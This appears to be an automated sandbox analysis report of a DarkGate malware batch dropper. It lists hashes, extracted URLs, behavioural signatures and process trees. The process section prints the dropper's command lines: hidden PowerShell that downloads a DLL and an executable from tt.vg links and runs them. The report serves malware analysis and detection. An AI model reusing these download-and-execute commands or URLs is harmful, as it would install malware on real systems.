Resubmissions (4)
- 25-08-2024 09:52: 240825-lwb7jsxgmh (score 10)
- 22-08-2024 07:27: 240822-h98wwsvdrh (score 10)
- 22-08-2024 07:21: 240822-h651tsxhrk (score 10)
- 21-08-2024 20:21: 240821-y44b8aydje (score 10)

Analysis
- max time kernel: 16s
- max time network: 18s
- platform: windows10-1703_x64
- resource: win10-20240404-en
- resource tags: arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
- submitted: 21-08-2024 20:21
Behavioral tasks
- behavioral1: exe/crypted/Dakrgate 5864 startup plus rootkit/Batch file for 5864v dll crypted darkgate/update.bat (resource: win10-20240404-en)
- behavioral2: exe/crypted/Dakrgate 5864 startup plus rootkit/Crypted_with AU3 with startup only with decoded Launcher VBS/launcher.vbs (resource: win10-20240404-en)
- behavioral3: exe/crypted/Dakrgate 5864 startup plus rootkit/Crypted_with AU3 with startup only with decoded Launcher VBS/libssp-0.dll (resource: win10-20240404-en)
- behavioral4: exe/crypted/Dakrgate 5864 startup plus rootkit/Crypted_with AU3 with startup only with decoded Launcher VBS/sqlite3.exe (resource: win10-20240404-en)
- behavioral5: exe/crypted/Dakrgate 5864 startup plus rootkit/protected_AU3_cGig/libssp-0.dll (resource: win10-20240404-en)
- behavioral6: exe/crypted/Dakrgate 5864 startup plus rootkit/protected_AU3_cGig/pidgin.exe (resource: win10-20240404-en)
- behavioral7: exe/crypted/Dakrgate 5864 startup plus rootkit/protected_AU3_cGig/sqlite3.dll (resource: win10-20240404-en)
- behavioral8: libssp-0.dll (resource: win10-20240404-en)
- behavioral9: pidgin.exe (resource: win10-20240404-en)
- behavioral10: sqlite3.dll (resource: win10-20240611-en)
- behavioral11: exe/non crypted/Darkgate 5864 port sample not startup/index.html (resource: win10-20240404-en)
- behavioral12: exe/non crypted/Darkgate 5864 port sample not startup/stubbed.exe (resource: win10-20240404-en)
- behavioral13: exe/non crypted/index.html (resource: win10-20240404-en)
General
- Target: exe/crypted/Dakrgate 5864 startup plus rootkit/Batch file for 5864v dll crypted darkgate/update.bat
- Size: 6KB
- MD5: 97b7c88a02b2a5214d742b7ed50f4544
- SHA1: 15bf7dd44049b94db1a82504802ead45f6186fa0
- SHA256: 20c3a5b1c87627e9e016494b806273230f5023cf12d2c0e29eceecb7b8a6d3b6
- SHA512: 918c856e61d8b348a705227ec381a8101481ec3aaa4a1f6545b9706ebf491d311cfe716f62ab04c796333bae5df857fc67cac86760be1c67578ca1031a906b25
- SSDEEP: 192:GqNFRmxkyzz06ETWtd4pTunJ8ccJkBhKhgQ:Vp2kgzSTWsu6hJEhKht

Malware Config
Extracted URLs:
- https://tt.vg/download-update-dll1
- https://tt.vg/dlldownload2sqliuit-download
- https://tt.vg/download-latest-update
Signatures
- Blocklisted process makes network request (4 IoCs)
  Processes: powershell.exe (PID 3644), network flows 2, 6, 8 and 9
- Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)
  Run Powershell and hide display window.
  Processes: powershell.exe (PID 3644), powershell.exe (PID 1604)
- Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes: powershell.exe (PID 3644), 3 occurrences
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: powershell.exe (PID 3644), Token: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (4 IoCs)
  Processes: cmd.exe (PID 2812) wrote to memory of powershell.exe (PID 3644), twice; cmd.exe (PID 2812) wrote to memory of powershell.exe (PID 1604), twice

Processes
- C:\Windows\system32\cmd.exe (PID 2812)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\exe\crypted\Dakrgate 5864 startup plus rootkit\Batch file for 5864v dll crypted darkgate\update.bat"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3644)
    Command line: powershell.exe -WindowStyle Hidden -Command "& {$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://tt.vg/download-update-dll1', 'C:\Users\Admin\AppData\Local\Temp\libssp-0.dll'); $wc.DownloadFile('https://tt.vg/dlldownload2sqliuit-download', 'C:\Users\Admin\AppData\Local\Temp\sqlite3.dll'); $wc.DownloadFile('https://tt.vg/download-latest-update', 'C:\Users\Admin\AppData\Local\Temp\pidgin.exe')}"
    Signatures: Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1604)
    Command line: powershell.exe -WindowStyle Hidden -Command "& {Start-Process 'C:\Users\Admin\AppData\Local\Temp\pidgin.exe' -WindowStyle Hidden}"
    Signatures: Command and Scripting Interpreter: PowerShell
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 1B
  MD5: c4ca4238a0b923820dcc509a6f75849b
  SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
  SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
  SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a